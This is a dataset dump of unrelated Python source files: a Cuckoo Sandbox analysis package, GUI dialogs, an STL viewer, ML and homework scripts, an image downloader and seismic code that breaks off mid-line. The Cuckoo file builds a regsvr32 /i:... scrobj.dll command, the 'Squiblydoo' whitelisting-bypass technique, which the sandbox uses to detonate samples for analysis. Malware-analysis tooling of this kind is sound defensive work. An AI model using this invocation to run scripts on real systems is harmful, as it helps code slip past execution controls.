self.edgeMap[edge].append(nfaState)\n\n","sub_path":"lab2/src/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565264541","text":"# Copyright (C) 2010-2015 Cuckoo Foundation.\n# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org\n# See the file 'docs/LICENSE' for copying permission.\n\nimport os\nimport shutil\n\nfrom lib.common.abstracts import Package\n\nclass SCT(Package):\n \"\"\"Squiblydoo analysis package.\"\"\"\n PATHS = [\n (\"SystemRoot\", \"system32\", \"regsvr32.exe\"),\n ]\n\n def start(self, path):\n regsvr32 = self.get_path(\"regsvr32.exe\")\n arguments = self.options.get(\"arguments\")\n\n if arguments:\n args = '{0} /i:\\\"{1}\\\" scrobj.dll'.format(arguments, path)\n else:\n args = '/i:\\\"{0}\\\" scrobj.dll'.format(path)\n\n return self.execute(regsvr32, args, path)\n","sub_path":"analyzer/windows/modules/packages/sct.py","file_name":"sct.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146266298","text":"import sys\nimport os\nfrom PyQt4 import QtGui, QtCore\n\ndef resource_path(relative):\n if hasattr(sys, \"_MEIPASS\"):\n return os.path.join(sys._MEIPASS, relative)\n return os.path.join(relative)\n\nclass DonateDialog(QtGui.QDialog):\n\n def __init__(self):\n super(DonateDialog, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('Donate Bitcoin')\n self.setWindowIcon(QtGui.QIcon(resource_path('data/icon.ico')));\n self.resize(350, 300)\n\n ok = QtGui.QPushButton(\"OK\")\n label_donate_bitcoin = QtGui.QLabel()\n address = QtGui.QLineEdit(\"\")\n label_qr_code = QtGui.QLabel()\n\n address.setAlignment(QtCore.Qt.AlignCenter)\n address.setReadOnly(True)\n address.setFixedWidth(250)\n\n label_donate_bitcoin.setPixmap(QtGui.QPixmap(resource_path('data/donate_bitcoin.png')))\n label_qr_code.setPixmap(QtGui.QPixmap(resource_path('data/qr_code.png')))\n\n vbox = QtGui.QVBoxLayout()\n hbox_buttons = QtGui.QHBoxLayout()\n\n # Horisontal buttons box (space, Ok, Cancel)\n hbox_buttons.addStretch(1)\n hbox_buttons.addWidget(ok)\n\n # Main vertical box\n vbox.addStretch(2)\n\n vbox.addWidget(label_donate_bitcoin, alignment = QtCore.Qt.AlignCenter)\n vbox.addStretch(2)\n vbox.addWidget(label_qr_code, alignment = QtCore.Qt.AlignCenter)\n vbox.addStretch(1)\n vbox.addWidget(address, alignment = QtCore.Qt.AlignCenter)\n vbox.addStretch(2)\n vbox.addLayout(hbox_buttons)\n\n self.setLayout(vbox)\n\n # Connect buttons to behaviour\n ok.clicked.connect(self.close)\n\nif __name__ == \"__main__\" :\n app = QtGui.QApplication(sys.argv)\n dialog = DonateDialog()\n dialog.show()\n sys.exit(app.exec_())\n","sub_path":"DonateDialog.py","file_name":"DonateDialog.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22682959","text":"from stl import mesh\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import pyplot\nfrom matplotlib import cm\nfrom numpy import array\nimport math\nimport stl\nimport numpy\n\ndef find_mins_maxs(obj):\n minx = maxx = miny = maxy = minz = maxz = None\n for p in obj.points:\n if minx is None:\n minx = p[stl.Dimension.X]\n maxx = p[stl.Dimension.X]\n miny = p[stl.Dimension.Y]\n maxy = p[stl.Dimension.Y]\n minz = p[stl.Dimension.Z]\n maxz = p[stl.Dimension.Z]\n else:\n maxx = max(p[stl.Dimension.X], maxx)\n minx = min(p[stl.Dimension.X], minx)\n maxy = max(p[stl.Dimension.Y], maxy)\n miny = min(p[stl.Dimension.Y], miny)\n maxz = max(p[stl.Dimension.Z], maxz)\n minz = min(p[stl.Dimension.Z], minz)\n return minx, maxx, miny, maxy, minz, maxz\n\ndef translate(_solid, step, padding, multiplier, axis):\n if axis == 'x':\n items = [0, 3, 6]\n elif axis == 'y':\n items = [1, 4, 7]\n elif axis == 'z':\n items = [2, 5, 8]\n for p in _solid.points:\n # point items are ((x, y, z), (x, y, z), (x, y, z))\n for i in range(3):\n p[items[i]] += (step * multiplier) + (padding * multiplier)\n\n\n#create new plot\nfigure = pyplot.figure()\naxes = mplot3d.Axes3D(figure)\n\n#load .stl file\nmesh = mesh.Mesh.from_file('/media/ruben/Seagate Expansion Drive/bachelorProject/test/Geit Gerda_Test_001.stl')\nprint('datatype:', type(mesh))\n\ntotal = len(mesh.v0) + len(mesh.v1) + len(mesh.v2)\nprint('Total amount of vertices: ', total)\n\n# #Put vertices in a file\n# file = open('vertices.txt', 'w')\n# for i in range(0,len(mesh.v0)):\n# triangle = str(mesh.v0[i]) + str(mesh.v1[i]) + str(mesh.v2[i]) + '\\n'\n# file.write(str(triangle))\n# file.close()\n\n#Auto scale to mesh size\n\nminx, maxx, miny, maxy, minz, maxz = find_mins_maxs(mesh)\nw = -maxx\nl = -maxy\nh = -maxz\n\ntranslate(mesh, w, 1, 1, 'x')\ntranslate(mesh, l, 1, 1, 'y')\ntranslate(mesh, h, 1, 1, 'z')\n\naxes.add_collection3d(mplot3d.art3d.Poly3DCollection(mesh.vectors, facecolor=(1,0,0), edgecolor='b'))\nscale = mesh.points.flatten(-1)\naxes.auto_scale_xyz(scale, scale, scale)\n\naxes.set_xlabel('x')\naxes.set_ylabel('y')\naxes.set_zlabel('z')\n\npyplot.show()\n","sub_path":"code/readMask.py","file_name":"readMask.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113223421","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport joblib\nimport test_data_process as tdp\n\n\n\ndef RMSE(Y_predict):\n\n y_test = pd.read_csv('../data/testfoo.csv', sep = ',')\n y_test = y_test['Correct First Attempt']\n\n y_test_list = y_test.ravel().tolist()\n Y_predict_list = Y_predict.tolist()\n sumi = 0 \n\n\n\n # print(Y_predict_list)\n # print(y_test_list)\n for i in range(0,len(y_test_list)):\n sumi += (y_test_list[i]-Y_predict_list[i][1])**2;\n\n rmse = pow(sumi/(len(Y_predict_list)-1), 0.5)\n\n #print(y_test_list)\n print(Y_predict_list)\n print(rmse)\n\n\n\ndef predict(testdata):\n\n \n #ss = joblib.load(\"../model/logistic_ss.model\") \n lr = joblib.load(\"./logistic_lr.model\")\n\n\n X_test = testdata\n print(testdata)\n # X_test = ss.transform(X_test) \n Y_predict = lr.predict_proba(X_test)\n\n RMSE(Y_predict)\n\n print(Y_predict)\n # print(y_test.ravel())\n\nif __name__ == '__main__':\n testdata = pd.read_csv(sys.argv[1], sep = ',')\n print(testdata.shape)\n predict(testdata)","sub_path":"src/predict_hot.py","file_name":"predict_hot.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122335931","text":"\"\"\"\n Client Handler\n Status: OK\n Protocol version: 1.0\n\"\"\"\n\nimport requests\nimport logging\n\nclass ClientHandler:\n \"\"\"\n Send requests to the main server\n \"\"\"\n def __init__(self, request_url: str, api_key: str):\n \"\"\"\n args:\n api_key: The API key to authenticate to the server\n \"\"\"\n self.base_url = request_url\n self.api_key = api_key\n self.timeout = 30\n self.logger = logging.getLogger(__name__)\n\n def get_module_id(self, mlists: list) -> list:\n try:\n resp = requests.post(\n \"{}{}\".format(self.base_url, \"module/get/ids\"),\n json=\n {\n 'apiKey': self.api_key,\n 'UUID': mlists\n },\n timeout=self.timeout)\n resp.raise_for_status()\n except Exception as ex:\n self.logger.error(\"Exception handled: {}\".format(ex))\n return None\n jresp = resp.json()\n if jresp[\"code\"] != \"GENERIC_OK\":\n self.logger.error(\"KO: Error code {}\".format(jresp['code']))\n return None\n id_list = jresp.get('moduleIDS', [])\n if not id_list:\n self.logger.critical(\"Empty module ids. Execution stop.\")\n raise AssertionError\n return id_list\n\n def module_send_production(self, prod_d: dict) -> dict:\n try:\n resp = requests.post(\n \"{}{}\".format(self.base_url, \"module/production/send\"),\n json=\n {\n \"apiKey\": self.api_key,\n \"production\": prod_d\n },\n timeout=self.timeout)\n resp.raise_for_status()\n except Exception as ex:\n self.logger.error(\"Exception handled: {}\".format(ex))\n return None\n jresp = resp.json()\n if jresp[\"code\"] != \"GENERIC_OK\":\n self.logger.error(\"KO: Error code {}\".format(jresp['code']))\n return None\n return jresp.get(\"commande\", [])\n","sub_path":"client/network/client_handler.py","file_name":"client_handler.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583410328","text":"# encoding: utf8\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport goatnails.db.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field=u'id')),\n ('title', models.CharField(max_length=50)),\n ('text', models.TextField()),\n ('creation_date', models.DateField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Screenshot',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field=u'id')),\n ('caption', models.CharField(max_length=500, blank=True)),\n ('creation_date', models.DateField(auto_now=True)),\n ('image', goatnails.db.models.ImageWithThumbsField(upload_to='uploads', blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"wildstar/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273296803","text":"import math\nimport os\nimport re\nimport sys\nimport rule34\nimport gui\nimport urllib.request\nimport concurrent.futures\nfrom queue import Queue\nfrom timeit import default_timer as timer\nfrom time import sleep\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass r34DwnldrGUI:\n def __init__(self, _app: QtWidgets.QApplication):\n self.searchTerm = None # The currently entered search term\n self.directory = None # The save directory\n self.downloadImages = False\n self.downloadVideos = False\n self.saveURLS = False\n self.createSubfolder = False\n self.downloadLimit = -1\n\n self.r34 = rule34.Sync()\n self.totalExpected = 0 # How many posts are expected\n self.postList = []\n\n self.stopFlag = False # Tells the currently running threads to stop\n self.done = False # Set to true when the download completes\n\n self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=2)\n\n self.progBarQueue = Queue()\n self.etaQueue = Queue()\n self.lcdQueue = Queue()\n self.currentTaskQueue = Queue()\n\n self.app = _app\n self.uiWindow = QtWidgets.QMainWindow()\n self.ui = gui.Ui_Rule34Downloader()\n\n @staticmethod\n def processQueue(queue: Queue, uiSetFunc, name=\"unnamed\"):\n \"\"\"\n Processes a queue for ui events. Necessary to avoid access violations with PyQT (only main thread can set ui)\n\n :param queue: a queue of ui values to be set\n :param uiSetFunc: the function to handle setting these ui values\n :param name: optional, the name of this queue (for debugging)\n :return:\n \"\"\"\n while not queue.empty():\n value = queue.get()\n # print(f\"Processing {name} queue: {job}\")\n if value is not None:\n uiSetFunc(value)\n\n def clearExecutor(self, wait=True):\n \"\"\"Clears the executor, to avoid access violations\n These tend to occur when the user tries to run 2 downloads without closing\"\"\"\n print(\"s t o p\")\n self.stopFlag = True\n self.executor.shutdown(wait=wait)\n self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=2)\n\n def runInExecutor(self, function, *args, **kwargs):\n \"\"\"Run a provided function in executor\"\"\"\n future = self.executor.submit(function, *args, **kwargs)\n while not future.done():\n if self.stopFlag or self.uiWindow.isHidden():\n # if uiWindow hidden, then the X button has been pressed\n self.stopFlag = True\n future.cancel()\n\n # process any pending ui sets\n self.processQueue(self.progBarQueue, self.ui.searchProgBar.setValue, name=\"ProgBar\")\n self.processQueue(self.etaQueue, self.ui.ETA.setText, name=\"ETA\")\n self.processQueue(self.lcdQueue, self.ui.searchLCD.display, name=\"LCD\")\n self.processQueue(self.currentTaskQueue, self.ui.currentTask.setText, name=\"CurrentTask\")\n\n # allow the ui system to process events\n self.app.processEvents()\n result = future.result()\n return result\n\n\n def _runAfterTask(self):\n self.checkCanBegin()\n self.ui.currentTask.setText(\"Idle\")\n\n def setupUI(self):\n \"\"\"Sets-up the ui\"\"\"\n self.app.setStyle(\"Fusion\")\n self.ui.setupUi(self.uiWindow)\n self.uiWindow.resize(500, 450)\n\n self.ui.searchProgBar.setValue(0)\n self.ui.destinationLine.setEnabled(False)\n self.ui.ETA.setText(\"0 seconds\")\n self.ui.currentTask.setText(\"Idle\")\n\n # setup events\n self.app.aboutToQuit.connect(self.quit)\n self.ui.browseButton.clicked.connect(self.browse)\n self.ui.searchButton.clicked.connect(self.search)\n self.ui.beginButton.clicked.connect(self.begin)\n self.ui.quitButton.clicked.connect(self.quit)\n self.ui.cancelButton.clicked.connect(self.cancel)\n self.ui.ckBoxSaveURLs.clicked.connect(self.checkCanBegin)\n self.ui.ckboxDownloadImages.clicked.connect(self.checkCanBegin)\n self.ui.ckBoxDownloadVideos.clicked.connect(self.checkCanBegin)\n\n self.uiWindow.show()\n\n def clearUI(self):\n \"\"\"Clears all ui elements\"\"\"\n self.ui.searchInput.setText(self.searchTerm)\n self.ui.destinationLine.setText(self.directory)\n self.ui.ckboxDownloadImages.setChecked(False)\n self.ui.ckBoxDownloadVideos.setChecked(False)\n self.ui.ckBoxSaveURLs.setChecked(False)\n self.ui.searchLCD.display(0)\n self.ui.ETA.setText(\"0 seconds\")\n self.ui.searchProgBar.setValue(0)\n # self.setProgBar()\n\n def toggleUI(self, state: bool):\n \"\"\"Allows you to disable all input ui, useful when downloading\"\"\"\n self.ui.searchButton.setEnabled(state)\n self.ui.browseButton.setEnabled(state)\n self.ui.beginButton.setEnabled(state)\n self.ui.ckBoxSaveURLs.setEnabled(state)\n self.ui.ckboxDownloadImages.setEnabled(state)\n self.ui.ckBoxSubfolder.setEnabled(state)\n self.ui.ckBoxDownloadVideos.setEnabled(state)\n self.ui.downloadLimit.setEnabled(state)\n\n def checkCanBegin(self):\n \"\"\"Checks if the program has all the information needed to download\"\"\"\n if self.searchTerm is not None and self.directory is not None:\n # if user has given a search term and a directory\n if self.ui.ckBoxSaveURLs.isChecked() or self.ui.ckBoxDownloadVideos.isChecked() or self.ui.ckboxDownloadImages.isChecked():\n # if the user has chosen at least 1 task\n return self.ui.beginButton.setEnabled(True)\n return self.ui.beginButton.setEnabled(False) # Disables the begin button\n\n def cacheUI(self):\n \"\"\"Caches the currently set options in the ui, so the threads dont need to access ui\"\"\"\n self.search()\n self.downloadImages = self.ui.ckboxDownloadImages.isChecked()\n self.downloadVideos = self.ui.ckBoxDownloadVideos.isChecked()\n self.saveURLS = self.ui.ckBoxSaveURLs.isChecked()\n self.createSubfolder = self.ui.ckBoxSubfolder.isChecked()\n self.downloadLimit = self.ui.downloadLimit.value()\n\n def _gatherPosts(self):\n \"\"\"Gathers posts from rule34 for a given tag\"\"\"\n postList = []\n\n if self.totalExpected == 0:\n self.search()\n estimatedPages = math.ceil(self.totalExpected/100)\n times = []\n\n # you could just gather all images at once, but because i want a progress bar, i have to do it manually\n for i in range(estimatedPages):\n start = timer()\n if self.stopFlag:\n return\n self.progBarQueue.put(int(\n (i / estimatedPages) * 100\n ))\n averageTime = sum(times) / len(times) if len(times) != 0 else 0.423\n eta = (estimatedPages-i) * averageTime\n if eta < 60:\n self.etaQueue.put(\n f\"{float(eta):.3} seconds\"\n )\n else:\n self.etaQueue.put(\n f\"{float(eta)/60:.3} minutes\"\n )\n page = self.r34.getImages(singlePage=True, OverridePID=i, tags=self.searchTerm)\n\n # process this page\n for post in page:\n video = (post.file_url.endswith(\"mp4\") or post.file_url.endswith(\"webm\")) # is this a video?\n if self.downloadImages or self.downloadVideos:\n if not self.downloadVideos:\n # if user doesnt want videos\n if video:\n continue\n elif self.downloadVideos and not self.downloadImages:\n # if user wants videos, but not images\n if not video:\n continue\n postList.append(post)\n\n self.lcdQueue.put(len(postList))\n\n # apply download limit if set\n if self.downloadLimit != -1:\n postList = postList[:self.downloadLimit]\n\n self.postList = postList\n end = timer()\n times.append(end-start)\n times = times[-100:]\n average = sum(times) / len(times)\n print(f\"Average time: {average}\")\n self.progBarQueue.put(100)\n return\n\n def _download(self):\n \"\"\"Downloads all posts in postList\"\"\"\n self.currentTaskQueue.put(f\"Downloading {len(self.postList)} posts\")\n # process directory\n directory = self.directory\n if self.createSubfolder:\n tempTag = re.compile('[^a-zA-Z]').sub('_', self.searchTerm) # clear non alpha-numeric characters\n newPathName = '_'.join(tempTag.split(\" \")) # clear spaces\n directory += f\"/{newPathName}\"\n if not os.path.isdir(directory):\n print(\"creating sub-folder\")\n os.mkdir(directory)\n\n numDownloaded = 0 # How many posts have been downloaded\n ETA = 0 # how many seconds estimated left\n times = [] # stores a list of execution times\n urlFile = None # the file for saving urls, if used\n\n if self.saveURLS:\n # if the user wants urls saved, create the file here\n print(\"Creating url file\")\n urlFileDir = f\"{directory}/urls.txt\"\n urlFile = open(urlFileDir, \"w\")\n urlFile.write(f\"### URLs for search: {self.searchTerm} ###\\n\")\n\n for post in self.postList:\n average = (sum(times) / len(times)) if len(times) != 0 else 5\n ETA = average * (len(self.postList) - numDownloaded)\n if ETA < 60:\n self.etaQueue.put(\n f\"{float(ETA):.3} seconds\"\n )\n else:\n self.etaQueue.put(\n f\"{float(ETA)/60:.3} minutes\"\n )\n\n self.progBarQueue.put(int(\n numDownloaded/len(self.postList)*100\n ))\n\n start = timer()\n if self.stopFlag:\n self.stopFlag = False\n if urlFile:\n urlFile.close()\n self.done = True\n return\n\n name = \"{}/{}.{}\".format(directory, post.id.split(\"/\")[-1], post.file_url.split(\".\")[-1])\n video = (\"webm\" in name or \"mp4\" in name)\n\n try:\n if self.saveURLS:\n print(\"Writing to file\")\n urlFile.write(\"\\n\" + post.file_url)\n\n if self.downloadImages or self.downloadVideos:\n if video and not self.downloadVideos:\n continue\n if not video and not self.downloadImages:\n continue\n\n if not os.path.isfile(name):\n with urllib.request.urlopen(post.file_url) as f:\n imageContent = f.read()\n # i use a download temp file because if the download is interrupted,\n # its obvious which is the garbled file\n with open(f\"{directory}/download.temp\", \"wb\") as _f:\n _f.write(imageContent)\n os.rename(f\"{directory}/download.temp\", name)\n\n numDownloaded += 1\n self.lcdQueue.put(numDownloaded)\n except Exception as e:\n print(f\"Skipping post due to error: {e}\")\n\n end = timer()\n times.append(end-start)\n times = times[-100:]\n if urlFile:\n urlFile.close()\n\n self.done = True\n return\n\n# region: button actions\n\n\n def browse(self):\n \"\"\"Opens the browse menu\"\"\"\n print(\"Browse button pressed\")\n self.ui.currentTask.setText(\"Waiting for directory\")\n\n # open a directory selection dialogue\n self.directory = str(QtWidgets.QFileDialog.getExistingDirectory(self.uiWindow, \"Select Directory\"))\n self.ui.destinationLine.setText(self.directory)\n\n self._runAfterTask()\n\n def search(self):\n \"\"\"Calls rule34 to search for images with given tag(s)\"\"\"\n print(\"Search button pressed\")\n self.ui.currentTask.setText(\"Searching Rule34\")\n\n self.searchTerm = self.ui.searchInput.text().replace(\",\", \"\").strip()\n self.ui.searchProgBar.setValue(25)\n # self.setProgBar(25)\n\n # technically this shouldn't need its own thread, but in theory it could crash the main thread, so im being safe\n self.totalExpected = self.runInExecutor(self.r34.totalImages, self.searchTerm)\n self.ui.searchProgBar.setValue(100)\n # self.setProgBar(100)\n self.ui.searchLCD.display(self.totalExpected)\n\n self._runAfterTask()\n\n def begin(self):\n \"\"\"Prepares the postList and starts the download\"\"\"\n print(\"Begin button pressed\")\n self.ui.currentTask.setText(\"Gathering and validating posts\")\n\n # disable the ui so user cant modify anything\n self.toggleUI(False)\n self.cacheUI()\n # gathers posts from r34 in separate thread\n self.runInExecutor(self._gatherPosts)\n\n self.runInExecutor(self._download)\n\n self.totalExpected = 0\n self.imgList = []\n self.stopFlag = False\n self.ui.ETA.setText(\"0 seconds\")\n if self.done:\n self.ui.currentTask.setText(\"Download Complete!\")\n self.ui.searchProgBar.setValue(100)\n\n # flash taskbar icon, and make a notification sound\n self.app.alert(self.uiWindow, msecs=0)\n self.app.beep()\n\n self.done = False\n self.toggleUI(True)\n\n def cancel(self):\n \"\"\"Clears the app, as if it had just opened\n If a download is currently running, thats stopped too\"\"\"\n print(\"Cancel\")\n self.toggleUI(False) # Make sure ui is disabled while we cancel\n\n # clear variables\n self.searchTerm = None\n self.directory = None\n self.totalExpected = 0\n self.imgList = []\n self.stopFlag = True\n self.done = False\n\n try:\n # wait for any download tasks to end\n self.clearExecutor()\n except:\n pass\n self.stopFlag = False\n\n self.clearUI()\n self.ui.currentTask.setText(\"Cancelled!\")\n self.toggleUI(True)\n self.checkCanBegin()\n\n def quit(self):\n \"\"\"As the name suggests\"\"\"\n print(\"Quit button pressed\")\n self.clearExecutor(wait=False)\n self.app.exit()\n\n# endregion\n\n\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n _r34D = r34DwnldrGUI(app)\n _r34D.setupUI()\n sys.exit(app.exec_())\n\n","sub_path":"mainGUI.py","file_name":"mainGUI.py","file_ext":"py","file_size_in_byte":14807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255700135","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 3 17:41:39 2021\n\n@author: Homework-16\n\"\"\"\n# 1 assignment\n# buxoriy = {\n# 'ism':'Abu Abdulloh Muhammad ibn Ismoil',\n# 'tyil':'810',\n# 'shahar':'buxoro',\n# 'vyil':60\n# }\n# qodiriy = {\n# 'ism':'abdulla qodiriy',\n# 'tyil':'1984',\n# 'shahar':'toshkent',\n# 'vyil':44\n# }\n# vohidov = {\n# 'ism':'erkin vohidov',\n# 'tyil':'1936',\n# 'shahar':'fargona',\n# 'vyil':80\n# }\n# navoi = {\n# 'ism':'alisher navoi',\n# 'tyil':'1441',\n# 'shahar':'xirot',\n# 'vyil':60\n# }\n\n# adabiyot = [buxoriy, qodiriy, vohidov, navoi]\n# for adab in adabiyot:\n# print(f\"{adab['ism'].title()}, \"\n# f\"{adab['tyil']}-yilda,\"\n# f\"{adab['shahar'].title()}da tavallud topgan.\"\n# f\"{adab['vyil']} yil umr kurgan\")\n\n# 2 assignment\n\n# shaxslar = {\n# 'abu Abdulloh Muhammad ibn Ismoil':['Al-Jome as sahih', 'Al-adab al-mufrat',\n# 'At-tarix al-kabir', 'At-tarix as-sagir'],\n# 'abdulla qodiriy':['Otgan kunlar', 'Mehrobdan chayon', 'Obid ketmon'],\n# 'erkin vohidov':['Tong nafasi', 'Qoshiqlarim sizga','Ozbegim', \n# 'Qiziquvchan Matsuma'],\n# 'alisher navoi':['Xamsa', 'Lison ut-Tayr', 'Mahbub Al-qulub', 'Munojot']\n# }\n# for ism, asarlar in shaxslar.items():\n# print(f\"\\n{ism.title()}ning mashxur asarlari: \")\n# for asar in asarlar: \n# print(asar.upper())\n\n# 3 Assignment\n\n# kinolar = {\n# 'ali':['terminator', 'rambo', 'titanic'],\n# 'vali':['tenet','inception','interstellar'],\n# 'hasan':['abdullajon','bomba','shaytanat'],\n# 'husan':['mahallada duv-duv gap','john wick']\n# }\n# for ism, movies in kinolar.items():\n# print(f\"\\n{ism.title()}ning sevimli kinolari: \")\n# for kino in movies:\n# print(kino.title())\n \n# davlatlar = {\n# 'ozbekiston':{'poytaht':'toshkent','hududi':448978,\n# 'aholisi':33000000,\n# 'pul birligi':'som'\n# },\n# 'rossiya':{'poytaht':'moskva','hududi':17098246,\n# 'aholisi':144000000, 'pul birligi':'rubl'\n# },\n# 'aqsh':{'poytaht':'washington d.c','hududi':9631418,\n# 'aholisi':327000000, 'pul birligi':'dollar'\n# },\n# 'malayziya':{'poytaht':'kuala-lumpur','hududi':329750,\n# 'aholisi':25000000, 'pul birligi':'rinngit'\n# }\n# }\n# for ism, info in davlatlar.items():\n# if ism.lower()=='aqsh':\n# ism = ism.upper()\n# else:\n# ism = ism.capitalize()\n# print(f\"\\n{ism}ning poytahti: {info['poytaht'].title()}\" \n# f\"\\nHududi: {info['hududi']} kv.km.\"\n# f\"\\nAholisi: {info['aholisi']}\"\n# f\"\\nPul birligi: {info['pul birligi']}\")\n \n\n# 4 Assignment\n\ndavlatlar = {\n 'ozbekiston':{'poytaht':'toshkent','hududi':448978,\n 'aholisi':33000000,\n 'pul birligi':'som'\n },\n 'rossiya':{'poytaht':'moskva','hududi':17098246,\n 'aholisi':144000000, 'pul birligi':'rubl'\n },\n 'aqsh':{'poytaht':'washington d.c','hududi':9631418,\n 'aholisi':327000000, 'pul birligi':'dollar'\n },\n 'malayziya':{'poytaht':'kuala-lumpur','hududi':329750,\n 'aholisi':25000000, 'pul birligi':'rinngit'}\n }\ndavlat = input('Davlat nomini kiriting...>>').lower()\nif davlat in davlatlar:\n info = davlatlar[davlat]\n print(f\"\\n{davlat.capitalize()}ning poytahti: {info['poytaht'].title()}\" \n f\"\\nHududi: {info['hududi']} kv.km.\"\n f\"\\nAholisi: {info['aholisi']}\"\n f\"\\nPul birligi: {info['pul birligi']}\")\nelse:\n print('Kechirasiz bizda bu davlat haqida malumot mavjud emas')\n \n\n\n\n \n \n \n \n \n\n\n\n\n","sub_path":"Lesson-16homework.py","file_name":"Lesson-16homework.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642240063","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\nЗадача C4-98.\r\nРешение на языке Python 3.\r\n-------------------------------------------------\r\n98) (А.А. Богданов – Danov1802 №27-5) На вход \r\nпрограммы поступает последовательность из N целых \r\nположительных чисел. Рассматриваются все пары \r\nразличных элементов последовательности (элементы \r\nпары не обязаны стоять в последовательности рядом, \r\nпорядок элементов в паре неважен). Необходимо \r\nопределить минимальную сумму произвольной пары чисел \r\nи количество пар с суммой равной минимальной. \r\nОписание входных и выходных данных\r\nВ первой строке входных данных задаётся количество \r\nчисел N (1 ≤ N ≤ 10000). В каждой из последующих N \r\nстрок записано одно натуральное число, не превышающее \r\n10000. В качестве результата программа должна вывести \r\nдва числа: найденную минимальную сумму и количество \r\nпар с суммой равной минимальной.\r\nПример входных данных №1: \r\n10 \r\n1 2 3 1 2 3 1 2 3 1\r\nВыходные данных для приведенного выше примера: 2 6\r\nПример входных данных №2: \r\n5 \r\n2 2 1 2 2\r\nВыходные данных для приведенного выше примера: 3 4\r\n\"\"\"\r\n# import sys\r\n# save_stdin = sys.stdin\r\n# sys.stdin = open(\"in/98.in\")\r\n\r\nn = int( input() )\r\nm1 = m2 = 10001\r\nk1 = 0\r\n\r\nfor i in range(n):\r\n a = int( input() )\r\n if a < m1:\r\n m2 = m1\r\n k2 = k1\r\n m1 = a\r\n k1 = 0\r\n elif a < m2:\r\n m2 = a\r\n k2 = 0 \r\n if a == m1:\r\n k1 += 1 \r\n if a == m2: \r\n k2 += 1\r\n\r\nif m1 == m2:\r\n k = k1*(k1-1) // 2\r\nelse: \r\n k = k2\r\n \r\nprint( m1+m2, k ) \r\n\r\n# sys.stdin = save_stdin","sub_path":"Sol/98.py","file_name":"98.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"276870987","text":"import logging\nimport numpy as np\n\nfrom scipy.signal import filtfilt\nfrom scipy.sparse.linalg import lsqr\nfrom scipy.special import hankel2\nfrom pylops.utils import dottest as Dottest\nfrom pylops import Diagonal, Identity, Block, BlockDiag\nfrom mdc_old import MDC\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.WARNING)\n\ndef directwave(wav, trav, nt, dt, nfft=None):\n r\"\"\"Analytical direct wave\n\n Compute analytical 2d Green's function in frequency domain given\n a traveltime curve ``trav`` and wavelet ``wav``.\n\n Parameters\n ----------\n wav : :obj:`numpy.ndarray`\n Wavelet in time domain to apply to direct arrival when created\n using ``trav``. Phase will be discarded resulting in a zero-phase\n wavelet with same amplitude spectrum as provided by ``wav``\n trav : :obj:`numpy.ndarray`\n Traveltime of first arrival from subsurface point to\n surface receivers of size :math:`\\lbrack nr \\times 1 \\rbrack`\n nt : :obj:`float`, optional\n Number of samples in time\n dt : :obj:`float`, optional\n Sampling in time\n nfft : :obj:`int`, optional\n Number of samples in fft time (if ``None``, :math:`nfft=nt`)\n\n Returns\n -------\n direct : :obj:`numpy.ndarray`\n Direct arrival in time domain of size\n :math:`\\lbrack nt \\times nr \\rbrack`\n\n \"\"\"\n nr = len(trav)\n nfft = nt if nfft is None or nfft < nt else nfft\n W = np.abs(np.fft.rfft(wav, nfft)) * dt\n f = 2 * np.pi * np.arange(nfft) / (dt * nfft)\n\n direct = np.zeros((nfft, nr), dtype=np.complex128)\n for it in range(len(W)):\n #direct[it] = W[it] * 1j * f[it] * np.exp(-1j * ((f[it] * trav) \\\n # + np.sign(f[it]) * np.pi / 4)) / \\\n # np.sqrt(8 * np.pi * np.abs(f[it]) * trav + 1e-10)\n direct[it] = W[it] * 1j * f[it] * (-1j) * \\\n hankel2(0, f[it] * trav + 1e-10) / 4\n\n direct = 